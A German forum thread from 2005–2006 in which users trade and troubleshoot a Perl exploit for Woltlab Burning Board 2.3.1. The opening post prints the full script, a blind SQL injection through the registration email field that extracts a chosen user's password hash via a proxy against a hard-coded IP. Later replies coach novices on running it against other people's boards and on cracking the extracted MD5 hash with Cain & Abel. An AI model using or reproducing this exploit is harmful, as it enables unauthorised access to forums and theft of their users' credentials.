Wbb 2.3.1 Hilfe

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von toschk, 24. Dezember 2005 .

Schlagworte:
  1. 24. Dezember 2005
    Also ich hab hier ein Wbb 2.3.1 Exploit, aber ich kann ums verrecken nicht connecten. Er sage immer er kann nicht connecten weil was in der zeile 51 ist. Liegt das jetzt am Code oder ein mir?? Und wenn jemand was weiß dann sagt er bitte.
    Code:
    #!/usr/bin/perl
    
    use strict;
    use IO::Socket::INET;
    
    
    $| = print "
    Woltlab Burning Board <= 2.3.1 Exploit
    Vulnerability discovered by GulfTech Security Research
    Visit www.security-project.org
    Exploit by deluxe89
    ----------
    ";
    
    
    
    my $host = '81.209.184.187';
    my $path = '/wbb/'; # path to the board
    my $userid = 490; # the password hash will be from the user with this id
    my $username = 'Marc'; # any username from the board
    my $proxy = '219.136.239.51:80'; # proxy, you can leave this empty
    my $error = 'E-Mail-Adresse ist unzul&auml;ssig'; # use 'email address entered is already ta' for english boards
    
    
    # proxy handling
    my ($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80);
    if($proxy ne '')
    {
     print "[~] Using a proxy\n";
    }
    else
    {
     print "[~] You're using NO proxy!\n";
     sleep(1);
    }
    
    
    
    
    
    #
    # Get the hash
    #
    
    print "[~] Getting the hash. Please wait some minutes..\n[+] Hash: ";
    
    
    my $hash = '';
    for(my $i=1;$i<33;$i++)
    {
     my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 50) or die('[-] Could not connect to server');
    
     if(&test($i, 96)) # buchstabe
     {
     for(my $c=97;$c<103;$c++)
     {
     if(&test($i, $c, 1))
     {
     print pack('c', $c);
     last;
     }
     }
     }
     else # zahl
     {
     #print "0-4\n";
     for(my $c=48;$c<58;$c++)
     {
     if(&test($i, $c, 1))
     {
     print pack('c', $c);
     last;
     }
     }
     }
    }
    print "\n";
    
    
    sub test
    {
     my ($i, $num, $g) = @_;
    
     my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('Could not connect to server');
     my $value = "sre4sdffr\@4g54asd5.org' OR (userid=$userid AND ascii(substring(password,$i,1))";
     $value .= ($g) ? '=' : '>';
     $value .= "$num)/*";
     my $data = "r_username=$username&r_email=$value&r_password=aaaaaaaa&r_confirmpassword=aaaaaaaa&r_homepage=&r_icq=&r_aim=&r_yim=&r_msn=&r_day=0&r_month=0&r_year=&r_gender=0&r_signature=&r_usertext=&field%5B1%5D=&field%5B2%5D=&field%5B3%5D=&r_invisible=0&r_usecookies=1&r_admincanemail=1&r_showemail=1&r_usercanemail=1&r_emailnotify=0&r_notificationperpm=0&r_receivepm=1&r_emailonpm=0&r_pmpopup=0&r_showsignatures=1&r_showavatars=1&r_showimages=1&r_daysprune=0&r_umaxposts=0&r_threadview=0&r_dateformat=d.m.Y&r_timeformat=H%3Ai&r_startweek=1&r_timezoneoffset=1&r_usewysiwyg=0&r_styleid=0&r_langid=0&send=send&sid=&disclaimer=viewed";
    
     print $sock "POST http://$host${path}register.php HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".length($data)."\r\n\r\n$data\r\n";
    
    
     while(<$sock>)
     {
     if($_ =~ m/$error/) { return 1; }
     }
     return 0;
    }
    
    
     
  2. 25. Dezember 2005
    lass doch ma den Proxy weg...
    und teste das ma an einem board von dir !
    Vieleicht liegts am Proxy!!!
     
  3. 25. Dezember 2005
    Liegt an dir oder deiner Verbindung.. gerade erfolgreich getestet..

    //ich hoffe doch du hast die IP und den Pfad angepasst..
    81.209.184.187/wbb/ => permission denied
     
  4. 25. Dezember 2005
     
  5. 27. Dezember 2005
    muss ich für perl irgendwas einstellen? also hab XP mit Sp2 und zonealarm.
    wie man im code sehen kann öftnet er ein port oder so. wielleicht wird das unterbunden?
     
  6. 27. Dezember 2005
    hast du active perl?
    wenn ja durch zonealarm freigegeben?
    welchen befehl gibst du ein?
    hast du die url richtig eingegeben?
    die richtige userid?

    frag dich diese fragen selber mal...


    Hier mal compiled:

    -

    Einfach "perl boardurl userid" eingeben => hash wird herausgegeben!
     
  7. 28. Dezember 2005
    Soll das ne Verarsche sein? Und wie kann ich active perl freigeben(gibt ja mehrere Dateien)? oder gibt es noch andere ausser active?
     
  8. 30. Dezember 2005
    wieso verarsche?
    beim exploit musst du ja auch deine einstellungen vornehmen, das passiert hier alles automatisch, was ist dein problem?

    achja du musst wbb davor schreiben^^ hab ich vergessen zu sagen!


    also wenn ihr active perl installiert abt:

    cmd öffnen -> in den ordner wo das wbb.exe liegt gehn -> wbb [Target] [Userid] eingeben!

    ein Beispeil wäre: wbb http://www.forum.de/wbb2/ 3

    dann noch enter und der hash wir dercrackt

    wers nicht glaubt, dem kann ich per icq weiterhelfen!
     
  9. 18. Januar 2006
    Also irgendwie kommt bei mir auch der gleiche Fehler! Bei mir ist es aber leider in Zeit 23! Wobei da bei mir nix drinne steht

    Kann mir jemand helfen und vllt nen Code geben der auch funktioniert, wo ich nur noch IP usw ändern muss?

    Gr33tz MasterBK 8)
     
  10. 24. Januar 2006
    Ich habe folgendes Prob wenn ich den Hash auslesen will funktioniert dies nur wenn ich kein Proxy Server an habe sonst bleibt der wert Hash blank und wird einfach übersprungen. Hatt von euch jemand vllt. ne Idee ?(

    MFG Final X-2
     
  11. 24. Januar 2006
    Kannste mal en Tutorial für diesen Exploit machen, weil ich check den auf keinem AUGE... leider. musst für mich au die Details erklären ^^
     
  12. 24. Januar 2006
    Hi,

    @Marlon:

    1.)Du erstellst eine exploit.pl
    2.)du nimmst einfach den Code, der oben steht und kopierst ihn in exploit.pl
    3.) Du suchst am Anfang des Exploits die ganzen Variablen:
    my $host = ''
    my $path = ''
    u.s.w.
    und setzt für diese Variablen ein.
    Also z.B. ist der host http://www.dasisteinforum.de und der path zum "Forum" lautet /wbb:
    my $host = 'dasisteinforum.de'
    my $path = '/wbb/'

    Bzw. ich bin mir nicht sicher , obs 'wbb' oder '/wbb' oder '/wbb/' ist. Einfach mal testen.

    Wenn du jetzt alle Variablen eingesetzt hast, einfach per Console den exploit starten. Das machst du mit perl:
    Code:
    du@woauchimmer:~$ perl exploit.pl
    Danach einfach den Output anschauen. Wenn irgendwas nicht funktioniert, nochmal die Variablen überprüfen.

    Mfg,

    Kolazomai
     
  13. 25. Januar 2006
    hm... erstmal THX für dein mini-tut. en 10ner hast, aber ein problem wäre da noch. Nämlich das wo der Output is und wie ich den exploit.pl mit active perl öffnen kann, ich kapiere dies du@woauchimmer nicht ^^
    sag mal wie ich des in perl eingeben muss. THX
    so siehts bei mir aus :

    my $host = 'http://43112.rapidforum.com/';
    my $path = '/wbb/'; # path to the board
    my $userid = 1; # the password hash will be from the user with this id
    my $username = 'WizZ4rd'; # any username from the board
    my $proxy = '219.136.239.51:80'; # proxy, you can leave this empty
    my $error = 'E-Mail-Adresse ist unzul&auml;ssig'; # use 'email address entered is already ta' for english boards
     
  14. 25. Januar 2006
    Also bei mir funzts soweit... nur wie gehe ich weiter vor? Was mache ich dann mit dem md5 hash ?(
    Sry wenn ich wie ein absoluter n00b klinge aber ich hab mit exploits noch nix gemacht...

    GreetZ, ~Br4inP4in~
     
  15. 25. Januar 2006
    @Marlon:

    in das Verzeichnis von active-perl im cmd ( start ->ausführen->cmd) wechseln und dann "perl.exe C: \exploit.pl" eingeben.

    @Brain:
    mit z.b. Cain (&Abel ) entschlüsseln.


    Mfg,

    Kolazomai
     
  16. 25. Januar 2006
    Sorry, aber ich bin einfach zu blöd das zu kapieren ?( bin auch en totaler n00b auf diesem gebiet weil ich da au noch nie was gemacht habe. Wäre sehr net, wenn du nomal so en Stichwort tut machen würdest, aber noch en bissle mehr erklären ^^ wäre net. Sp siehts bei mir aus :
    my $host = 'http://43112.rapidforum.com/';
    my $path = '/wbb/'; # path to the board
    my $userid = 1; # the password hash will be from the user with this id
    my $username = 'WizZ4rd'; # any username from the board
    my $proxy = '219.136.239.51:80'; # proxy, you can leave this empty
    my $error = 'E-Mail-Adresse ist unzul&auml;ssig'; # use 'email address entered is already ta' for english boards
     
  17. 25. Januar 2006
    @Marlon
    Mit dem Board welches du eingetragen hast kann es auch nicht funktionieren da es kein Woltlab Burning Board 2.3.1 und sich dieser Exploit nur auf solche Boards bezieht :]

    @~Br4inP4in~
    Hierher bekommste Cain&Abel falls du hilfe brauchst sag bescheid

    MFG Final X-2

    //EDIT BOB sry wegen der Rechtschreibung, wusste es nicht mehr ganz genau
     
  18. 25. Januar 2006
    Lol da musste ich mir auch schon einen ablachen, er will den exploit bei nem rapidforum anwenden ^^ zu geil !

    ahja es Heißt Woltlab Burning Board
     
  19. 26. Januar 2006
    Thx@Final X-2, aber hatte es schon gefunden :]
    Denke ich komme damit zurecht, aber doch recht vielseitiges tool ,
    wundert mich dass ich es noch nie gesehen hab...

    GreetZ, ~Br4inP4in~
     
  20. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.